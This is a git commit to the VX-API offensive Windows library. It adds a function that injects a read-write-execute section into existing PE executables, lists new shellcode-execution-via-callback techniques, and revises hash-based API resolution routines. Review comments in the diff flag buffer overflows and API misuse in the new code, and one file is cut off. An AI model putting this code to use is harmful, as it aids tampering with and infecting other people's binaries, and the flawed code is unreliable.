2.0.607
This commit is contained in:
vxunderground 2022-12-27 11:19:00 -06:00
parent c91d3da65e
commit e56f07d798
48 changed files with 979 additions and 117 deletions


@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
# VX-API
Version: 2.0.559
Version: 2.0.607
Developer: smelly__vx
@ -129,6 +129,9 @@ You're free to use this in any manner you please. You do not need to use this en
| GetCurrentProcessIdFromOffset | RistBS | Helper Functions |
| GetPeBaseAddress | smelly__vx | Helper Functions |
| LdrLoadGetProcedureAddress | c5pider | Helper Functions |
| IsPeSection | smelly__vx | Helper Functions |
| AddSectionToPeFile | smelly__vx | Helper Functions |
| WriteDataToPeSection | smelly__vx | Helper Functions |
| GetKUserSharedData | Geoff Chappell | Library Loading |
| GetModuleHandleEx2 | smelly__vx | Library Loading |
| GetPeb | 29a | Library Loading |
@ -191,6 +194,16 @@ You're free to use this in any manner you please. You do not need to use this en
| MpfPiQueueUserAPCViaAtomBomb | SafeBreach Labs | Malcode |
| MpfPiWriteProcessMemoryCreateRemoteThread | SafeBreach Labs | Malcode |
| MpfProcessInjectionViaProcessReflection | Deep Instinct | Malcode |
| MpfSceViaImmEnumInputContext | alfarom256, aahmad097 | Malcode |
| MpfSceViaCertFindChainInStore | alfarom256, aahmad097 | Malcode |
| MpfSceViaEnumPropsExW | alfarom256, aahmad097 | Malcode |
| MpfSceViaCreateThreadpoolWait | alfarom256, aahmad097 | Malcode |
| MpfSceViaCryptEnumOIDInfo | alfarom256, aahmad097 | Malcode |
| MpfSceViaDSA_EnumCallback | alfarom256, aahmad097 | Malcode |
| MpfSceViaCreateTimerQueueTimer | alfarom256, aahmad097 | Malcode |
| MpfSceViaEvtSubscribe | alfarom256, aahmad097 | Malcode |
| MpfSceViaFlsAlloc | alfarom256, aahmad097 | Malcode |
| MpfSceViaInitOnceExecuteOnce | alfarom256, aahmad097 | Malcode |
| UrlDownloadToFileSynchronous | Hans Passant | Networking |
| ConvertIPv4IpAddressStructureToString | smelly__vx | Networking |
| ConvertIPv4StringToUnsignedLong | smelly__vx | Networking |


@ -0,0 +1,186 @@
#include "Win32Helper.h"
DWORD AlignSection(_In_ DWORD Size, _In_ DWORD Align, _In_ DWORD Address)
{
if (!(Size % Align))
return Address + Size;
return Address + (Size / Align + 1) * Align;
}
BOOL AddSectionToPeFileW(_In_ LPCWSTR Path, _In_ LPCSTR SectionName, _In_ DWORD SectionSizeInBytes)
{
BOOL bFlag = FALSE;
HANDLE hHandle = INVALID_HANDLE_VALUE;
LONGLONG SizeOfTargetBinary = 0L;
PBYTE FileBuffer = NULL;
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
PIMAGE_SECTION_HEADER Section = NULL;
WORD Offset = ERROR_SUCCESS;
DWORD SectionCharacteristics = ERROR_SUCCESS;
WCHAR DisposeableObject[32] = { 0 };
if (CharStringToWCharString(DisposeableObject, (PCHAR)SectionName, StringLengthA(SectionName)) == 0)
goto EXIT_ROUTINE;
if(IsPeSectionW(Path, DisposeableObject))
return TRUE;
SizeOfTargetBinary = GetFileSizeFromPathW((PWCHAR)Path, FILE_ATTRIBUTE_NORMAL);
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
goto EXIT_ROUTINE;
hHandle = CreateFileW(Path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hHandle == INVALID_HANDLE_VALUE)
goto EXIT_ROUTINE;
FileBuffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
if (FileBuffer == NULL)
goto EXIT_ROUTINE;
if (!ReadFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
goto EXIT_ROUTINE;
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &FileBuffer))
goto EXIT_ROUTINE;
Section = (PIMAGE_SECTION_HEADER)(FileBuffer + Dos->e_lfanew + sizeof(IMAGE_NT_HEADERS));
Offset = File->NumberOfSections;
RtlZeroMemory(&Section[Offset], sizeof(IMAGE_SECTION_HEADER));
RtlCopyMemory(&Section[Offset].Name, SectionName, StringLengthA(SectionName));
Section[Offset].Misc.VirtualSize = AlignSection(SectionSizeInBytes, Optional->SectionAlignment, 0);
Section[Offset].VirtualAddress = AlignSection(Section[Offset - 1].Misc.VirtualSize, Optional->SectionAlignment, Section[Offset - 1].VirtualAddress);
Section[Offset].SizeOfRawData = AlignSection(SectionSizeInBytes, Optional->FileAlignment, 0);
Section[Offset].PointerToRawData = AlignSection(Section[Offset - 1].SizeOfRawData, Optional->FileAlignment, Section[Offset - 1].PointerToRawData);
SectionCharacteristics = IMAGE_SCN_MEM_WRITE |
IMAGE_SCN_CNT_CODE |
IMAGE_SCN_CNT_UNINITIALIZED_DATA |
IMAGE_SCN_MEM_EXECUTE |
IMAGE_SCN_CNT_INITIALIZED_DATA |
IMAGE_SCN_MEM_READ;
Section[Offset].Characteristics = SectionCharacteristics;
if (SetFilePointer(hHandle, Section[Offset].PointerToRawData + Section[Offset].SizeOfRawData, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
goto EXIT_ROUTINE;
if (!SetEndOfFile(hHandle))
goto EXIT_ROUTINE;
Optional->SizeOfImage = Section[Offset].VirtualAddress + Section[Offset].Misc.VirtualSize;
File->NumberOfSections += 1;
if (SetFilePointer(hHandle, 0, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
goto EXIT_ROUTINE;
if (!WriteFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
if (FileBuffer)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, FileBuffer);
if (hHandle)
CloseHandle(hHandle);
return bFlag;
}
BOOL AddSectionToPeFileA(_In_ LPCSTR Path, _In_ LPCSTR SectionName, _In_ DWORD SectionSizeInBytes)
{
BOOL bFlag = FALSE;
HANDLE hHandle = INVALID_HANDLE_VALUE;
LONGLONG SizeOfTargetBinary = 0L;
PBYTE FileBuffer = NULL;
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
PIMAGE_SECTION_HEADER Section = NULL;
WORD Offset = ERROR_SUCCESS;
DWORD SectionCharacteristics = ERROR_SUCCESS;
if (IsPeSectionA(Path, SectionName))
return TRUE;
SizeOfTargetBinary = GetFileSizeFromPathA((PCHAR)Path, FILE_ATTRIBUTE_NORMAL);
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
goto EXIT_ROUTINE;
hHandle = CreateFileA(Path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hHandle == INVALID_HANDLE_VALUE)
goto EXIT_ROUTINE;
FileBuffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
if (FileBuffer == NULL)
goto EXIT_ROUTINE;
if (!ReadFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
goto EXIT_ROUTINE;
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &FileBuffer))
goto EXIT_ROUTINE;
Section = (PIMAGE_SECTION_HEADER)(FileBuffer + Dos->e_lfanew + sizeof(IMAGE_NT_HEADERS));
Offset = File->NumberOfSections;
RtlZeroMemory(&Section[Offset], sizeof(IMAGE_SECTION_HEADER));
RtlCopyMemory(&Section[Offset].Name, SectionName, StringLengthA(SectionName));
Section[Offset].Misc.VirtualSize = AlignSection(SectionSizeInBytes, Optional->SectionAlignment, 0);
Section[Offset].VirtualAddress = AlignSection(Section[Offset - 1].Misc.VirtualSize, Optional->SectionAlignment, Section[Offset - 1].VirtualAddress);
Section[Offset].SizeOfRawData = AlignSection(SectionSizeInBytes, Optional->FileAlignment, 0);
Section[Offset].PointerToRawData = AlignSection(Section[Offset - 1].SizeOfRawData, Optional->FileAlignment, Section[Offset - 1].PointerToRawData);
SectionCharacteristics = IMAGE_SCN_MEM_WRITE |
IMAGE_SCN_CNT_CODE |
IMAGE_SCN_CNT_UNINITIALIZED_DATA |
IMAGE_SCN_MEM_EXECUTE |
IMAGE_SCN_CNT_INITIALIZED_DATA |
IMAGE_SCN_MEM_READ;
Section[Offset].Characteristics = SectionCharacteristics;
if (SetFilePointer(hHandle, Section[Offset].PointerToRawData + Section[Offset].SizeOfRawData, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
goto EXIT_ROUTINE;
if (!SetEndOfFile(hHandle))
goto EXIT_ROUTINE;
Optional->SizeOfImage = Section[Offset].VirtualAddress + Section[Offset].Misc.VirtualSize;
File->NumberOfSections += 1;
if (SetFilePointer(hHandle, 0, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
goto EXIT_ROUTINE;
if (!WriteFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
if (FileBuffer)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, FileBuffer);
if (hHandle)
CloseHandle(hHandle);
return bFlag;
}
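Review bot: `RtlCopyMemory(&Section[Offset].Name, SectionName, StringLengthA(SectionName));` copies the caller's whole string into the 8-byte `Name` field, so a SectionName longer than IMAGE_SIZEOF_SHORT_NAME overwrites `Misc.VirtualSize` and the fields after it (the same line is in AddSectionToPeFileA, and the W variant's conversion into `DisposeableObject[32]` is equally unbounded); copying at most IMAGE_SIZEOF_SHORT_NAME bytes, or rejecting longer names before the file is opened, keeps the header intact. `ReadFile`/`WriteFile` are called with both the bytes-transferred pointer and lpOverlapped NULL, which the API does not permit; pass a `DWORD` out-variable and compare it with `SizeOfTargetBinary` so a short read is not parsed as a complete image. The cleanup `if (hHandle) CloseHandle(hHandle);` tests for NULL while `hHandle` starts as INVALID_HANDLE_VALUE, so every early exit taken before CreateFileW succeeds passes the sentinel to CloseHandle; compare with INVALID_HANDLE_VALUE instead. The same ReadFile and handle-sentinel issues recur in the new IsPeSection.cpp.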


@ -1,6 +1,6 @@
#include "Win32Helper.h"
BOOL CreateLocalAppDataObjectPathW(_Inout_ PWCHAR pBuffer, _In_ PWCHAR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist)
BOOL CreateLocalAppDataObjectPathW(_Inout_ PWCHAR pBuffer, _In_ LPCWSTR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist)
{
if (pBuffer == NULL)
return FALSE;
@ -20,7 +20,7 @@ BOOL CreateLocalAppDataObjectPathW(_Inout_ PWCHAR pBuffer, _In_ PWCHAR Path, _In
return TRUE;
}
BOOL CreateLocalAppDataObjectPathA(_Inout_ PCHAR pBuffer, _In_ PCHAR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist)
BOOL CreateLocalAppDataObjectPathA(_Inout_ PCHAR pBuffer, _In_ LPCSTR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist)
{
if (pBuffer == NULL)
return FALSE;


@ -1,7 +1,7 @@
#include "Win32Helper.h"
#include <Wincrypt.h>
BOOL CreateMd5HashFromFilePathW(_In_ PWCHAR FilePath, _Inout_ PWCHAR Md5Hash)
BOOL CreateMd5HashFromFilePathW(_In_ LPCWSTR FilePath, _Inout_ PWCHAR Md5Hash)
{
HANDLE hHandle = INVALID_HANDLE_VALUE;
HCRYPTPROV hProvider = NULL;
@ -65,7 +65,7 @@ EXIT_ROUTINE:
return bFlag;
}
BOOL CreateMd5HashFromFilePathA(_In_ PCHAR FilePath, _Inout_ PCHAR Md5Hash)
BOOL CreateMd5HashFromFilePathA(_In_ LPCSTR FilePath, _Inout_ PCHAR Md5Hash)
{
HANDLE hHandle = INVALID_HANDLE_VALUE;
HCRYPTPROV hProvider = NULL;


@ -31,7 +31,7 @@ DWORD64 __stdcall GetProcAddressA(_In_ DWORD64 ModuleBase, _In_ LPCSTR lpProcNam
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
@ -80,7 +80,7 @@ DWORD64 __stdcall GetProcAddressW(_In_ DWORD64 ModuleBase, _In_ LPCWSTR lpProcNa
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)
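Review bot: `ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);` silences the narrowing warning without bounding the value, so a forwarder name of 64 KiB or more would be silently truncated and `MaximumLength = Length + sizeof(CHAR)` would wrap to 0 at 0xFFFF; the same line is changed in the Djb2, FowlerNollVoVariant1a, JenkinsOneAtATime32Bit, LoseLose, Murmur, Rotr32, Sdbm, SipHash, SuperFastHash and UnknownGenericHash1 GetProcAddress variants. Such a name is not plausible from a well-formed export directory but is possible from a crafted image, so either a comment stating why truncation is acceptable, or a guard such as `if (StringLengthA((PCHAR)pFunctionName) >= USHRT_MAX) /* fail like the surrounding paths */` before the assignment, would make the assumption explicit. The enclosing functions start and end outside the hunk.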


@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressDjb2(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash)
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)


@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(_In_ DWORD64 ModuleBase, _
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)


@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(_In_ DWORD64 ModuleBase,
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)


@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressLoseLose(_In_ DWORD64 ModuleBase, _In_ DWORD64 H
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)


@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressMurmur(_In_ DWORD64 ModuleBase, _In_ DWORD64 Has
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)


@ -33,7 +33,7 @@ DWORD64 __stdcall GetProcAddressRotr32(_In_ DWORD64 ModuleBase, _In_ DWORD64 Has
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)


@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressSdbm(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash)
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)


@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressSipHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Ha
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)


@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressSuperFastHash(_In_ DWORD64 ModuleBase, _In_ DWOR
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)


@ -32,7 +32,7 @@ DWORD64 __stdcall GetProcAddressUnknownGenericHash1(_In_ DWORD64 ModuleBase, _In
FunctionAddress < (ModuleBase + Optional->DataDirectory[0].VirtualAddress) + (ModuleBase + Optional->DataDirectory[0].Size))
{
ForwardFunctionString.Buffer = (PCHAR)pFunctionName;
ForwardFunctionString.Length = StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.Length = (USHORT)StringLengthA((PCHAR)pFunctionName);
ForwardFunctionString.MaximumLength = ForwardFunctionString.Length + sizeof(CHAR);
if (LdrGetProcedureAddress((HMODULE)ModuleBase, &ForwardFunctionString, 0, &FunctionAddress) != STATUS_SUCCESS)


@ -1,7 +1,7 @@
#include "Win32Helper.h"
//NOTE: PULONG must be pointed to an array of ULONG integers e.g. ULONG FileHash[4] = { 0 };
BOOL HashFileByMsiFileHashTableW(_In_ PWCHAR Path, _Inout_ PULONG FileHash)
BOOL HashFileByMsiFileHashTableW(_In_ LPCWSTR Path, _Inout_ PULONG FileHash)
{
MSIGETFILEHASHW MsiGetFileHashW = NULL;
MSIFILEHASHINFO Hash = { 0 };
@ -40,7 +40,7 @@ EXIT_ROUTINE:
return bFlag;
}
BOOL HashFileByMsiFileHashTableA(_In_ PCHAR Path, _Inout_ PULONG FileHash)
BOOL HashFileByMsiFileHashTableA(_In_ LPCSTR Path, _Inout_ PULONG FileHash)
{
MSIGETFILEHASHA MsiGetFileHashA = NULL;
MSIFILEHASHINFO Hash = { 0 };


@ -1,6 +1,6 @@
#include "Win32Helper.h"
DWORD HashStringDjb2A(_In_ PCHAR String)
DWORD HashStringDjb2A(_In_ LPCSTR String)
{
ULONG Hash = 5381;
INT c = 0;
@ -11,7 +11,7 @@ DWORD HashStringDjb2A(_In_ PCHAR String)
return Hash;
}
DWORD HashStringDjb2W(_In_ PWCHAR String)
DWORD HashStringDjb2W(_In_ LPCWSTR String)
{
ULONG Hash = 5381;
INT c = 0;


@ -1,6 +1,6 @@
#include "Win32Helper.h"
ULONG HashStringFowlerNollVoVariant1aA(_In_ PCHAR String)
ULONG HashStringFowlerNollVoVariant1aA(_In_ LPCSTR String)
{
ULONG Hash = 0x811c9dc5;
@ -13,7 +13,7 @@ ULONG HashStringFowlerNollVoVariant1aA(_In_ PCHAR String)
return Hash;
}
ULONG HashStringFowlerNollVoVariant1aW(_In_ PWCHAR String)
ULONG HashStringFowlerNollVoVariant1aW(_In_ LPCWSTR String)
{
ULONG Hash = 0x811c9dc5;


@ -1,6 +1,6 @@
#include "Win32Helper.h"
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String)
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ LPCSTR String)
{
SIZE_T Index = 0;
UINT32 Hash = 0;
@ -20,7 +20,7 @@ UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String)
return Hash;
}
UINT32 HashStringJenkinsOneAtATime32BitW(_In_ PWCHAR String)
UINT32 HashStringJenkinsOneAtATime32BitW(_In_ LPCWSTR String)
{
SIZE_T Index = 0;
UINT32 Hash = 0;


@ -1,6 +1,6 @@
#include "Win32Helper.h"
DWORD HashStringLoseLoseA(_In_ PCHAR String)
DWORD HashStringLoseLoseA(_In_ LPCSTR String)
{
ULONG Hash = 0;
INT c;
@ -11,7 +11,7 @@ DWORD HashStringLoseLoseA(_In_ PCHAR String)
return Hash;
}
DWORD HashStringLoseLoseW(_In_ PWCHAR String)
DWORD HashStringLoseLoseW(_In_ LPCWSTR String)
{
ULONG Hash = 0;
INT c;


@ -1,6 +1,6 @@
#include "Win32Helper.h"
INT32 HashStringMurmurW(_In_ PWCHAR String)
INT32 HashStringMurmurW(_In_ LPCWSTR String)
{
INT Length = (INT)StringLengthW(String);
UINT32 hash = 0;
@ -57,7 +57,7 @@ INT32 HashStringMurmurW(_In_ PWCHAR String)
return hash;
}
INT32 HashStringMurmurA(_In_ PCHAR String)
INT32 HashStringMurmurA(_In_ LPCSTR String)
{
INT Length = (INT)StringLengthA(String);
UINT32 hash = 0;


@ -10,7 +10,7 @@ UINT32 HashStringRotr32SubA(UINT32 Value, UINT Count)
#pragma warning( pop )
}
INT HashStringRotr32A(_In_ PCHAR String)
INT HashStringRotr32A(_In_ LPCSTR String)
{
INT Value = 0;
@ -30,7 +30,7 @@ UINT32 HashStringRotr32SubW(UINT32 Value, UINT Count)
#pragma warning( pop )
}
INT HashStringRotr32W(_In_ PWCHAR String)
INT HashStringRotr32W(_In_ LPCWSTR String)
{
INT Value = 0;


@ -1,6 +1,6 @@
#include "Win32Helper.h"
DWORD HashStringSdbmA(_In_ PCHAR String)
DWORD HashStringSdbmA(_In_ LPCSTR String)
{
ULONG Hash = 0;
INT c;
@ -11,7 +11,7 @@ DWORD HashStringSdbmA(_In_ PCHAR String)
return Hash;
}
DWORD HashStringSdbmW(_In_ PWCHAR String)
DWORD HashStringSdbmW(_In_ LPCWSTR String)
{
ULONG Hash = 0;
INT c;


@ -21,11 +21,11 @@
} while (0)
INT32 HashStringSipHashW(_In_ PWCHAR String)
INT32 HashStringSipHashW(_In_ LPCWSTR String)
{
INT Length = (INT)StringLengthW(String);
UINT64 hash = ((UINT64)Length) << 56;
PWCHAR end = String + Length - (Length % sizeof(UINT64));
PWCHAR end = (PWCHAR)String + Length - (Length % sizeof(UINT64));
INT left = Length & 7;
@ -93,11 +93,11 @@ INT32 HashStringSipHashW(_In_ PWCHAR String)
}
INT32 HashStringSipHashA(_In_ PCHAR String)
INT32 HashStringSipHashA(_In_ LPCSTR String)
{
INT Length = (INT)StringLengthA(String);
UINT64 hash = ((UINT64)Length) << 56;
PCHAR end = String + Length - (Length % sizeof(UINT64));
PCHAR end = (PCHAR)String + Length - (Length % sizeof(UINT64));
INT left = Length & 7;
UINT64 m;
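Review bot: `PWCHAR end = (PWCHAR)String + Length - (Length % sizeof(UINT64));` casts away the constness that the new `LPCWSTR` parameter just introduced; if `end` is only used as a bound, declaring it `LPCWSTR end = String + Length - (Length % sizeof(UINT64));` (and `LPCSTR end` in HashStringSipHashA) keeps the function const-correct without a cast. The same pattern appears in HashStringUnknownGenericHash1A/W, where `Pointer` could be declared `LPCSTR`/`LPCWSTR` instead of being cast back to `PCHAR`/`PWCHAR` in the for-initialiser. Both SipHash functions continue outside the hunk, so this assumes the rest of the body never writes through `end`.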


@ -1,6 +1,6 @@
#include "Win32Helper.h"
UINT32 HashStringSuperFastHashA(_In_ PCHAR String)
UINT32 HashStringSuperFastHashA(_In_ LPCSTR String)
{
INT Length = (INT)StringLengthA(String);
UINT32 Hash = Length;
@ -56,7 +56,7 @@ UINT32 HashStringSuperFastHashA(_In_ PCHAR String)
return Hash;
}
UINT32 HashStringSuperFastHashW(_In_ PWCHAR String)
UINT32 HashStringSuperFastHashW(_In_ LPCWSTR String)
{
INT Length = (INT)StringLengthW(String);
UINT32 Hash = Length;


@ -1,12 +1,12 @@
#include "Win32Helper.h"
INT HashStringUnknownGenericHash1A(_In_ PCHAR String)
INT HashStringUnknownGenericHash1A(_In_ LPCSTR String)
{
PCHAR Pointer;
INT Generic;
INT Hash = 0;
for (Pointer = String; *Pointer != '\0'; Pointer++)
for (Pointer = (PCHAR)String; *Pointer != '\0'; Pointer++)
{
Hash = (Hash << 4) + (INT)(*Pointer);
Generic = Hash & 0xF0000000L;
@ -20,13 +20,13 @@ INT HashStringUnknownGenericHash1A(_In_ PCHAR String)
return Hash;
}
INT HashStringUnknownGenericHash1W(_In_ PWCHAR String)
INT HashStringUnknownGenericHash1W(_In_ LPCWSTR String)
{
PWCHAR Pointer;
INT Generic;
INT Hash = 0;
for (Pointer = String; *Pointer != '\0'; Pointer++)
for (Pointer = (PWCHAR)String; *Pointer != '\0'; Pointer++)
{
Hash = (Hash << 4) + (INT)(*Pointer);
Generic = Hash & 0xF0000000L;


@ -1,6 +1,6 @@
#include "Win32Helper.h"
BOOL IsPathValidA(_In_ PCHAR FilePath)
BOOL IsPathValidA(_In_ LPCSTR FilePath)
{
HANDLE hFile = INVALID_HANDLE_VALUE;
@ -14,7 +14,7 @@ BOOL IsPathValidA(_In_ PCHAR FilePath)
return TRUE;
}
BOOL IsPathValidW(_In_ PWCHAR FilePath)
BOOL IsPathValidW(_In_ LPCWSTR FilePath)
{
HANDLE hFile = INVALID_HANDLE_VALUE;

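--- /dev/null
+++ b/VX-API/IsPeSection.cpp
@@ -0,0 +1,108 @@
+#include "Win32Helper.h"
+BOOL IsPeSectionW(_In_ LPCWSTR PathToBinary, _In_ LPCWSTR PeSectionName)
+{
+BOOL bFlag = FALSE;
+HANDLE hHandle = INVALID_HANDLE_VALUE;
+PBYTE Buffer = NULL;
+LONGLONG SizeOfTargetBinary = 0L;
+PIMAGE_DOS_HEADER Dos = NULL;
+PIMAGE_NT_HEADERS Nt = NULL;
+PIMAGE_FILE_HEADER File = NULL;
+PIMAGE_OPTIONAL_HEADER Optional = NULL;
+PIMAGE_SECTION_HEADER Section = NULL;
+PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
+CHAR SectionName[32] = { 0 };
+if (WCharStringToCharString(SectionName, (PWCHAR)PeSectionName, StringLengthW(PeSectionName)) == 0)
+goto EXIT_ROUTINE;
+SizeOfTargetBinary = GetFileSizeFromPathW((PWCHAR)PathToBinary, FILE_ATTRIBUTE_NORMAL);
+if (SizeOfTargetBinary == INVALID_FILE_SIZE)
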